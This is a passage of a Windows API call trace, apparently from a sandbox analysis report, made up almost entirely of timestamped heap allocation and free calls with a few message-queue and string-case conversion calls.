RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0245.390] CharLowerBuffW (in: lpsz="byte[68976]", cchLength=0xb | out: lpsz="byte[68976]") returned 0xb [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0245.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d70) returned 0x2e7f320 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0245.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d6c) returned 0x2e90098 [0245.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d6c) returned 0x2ea0e10 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90098 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0e10 | out: hHeap=0x970000) returned 1 [0245.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0245.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0245.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0245.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0245.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0245.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0245.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0245.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0245.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d6c) returned 0x2e90098 [0245.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90098 | out: hHeap=0x970000) returned 1 [0245.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0245.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0245.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0245.424] HeapFree 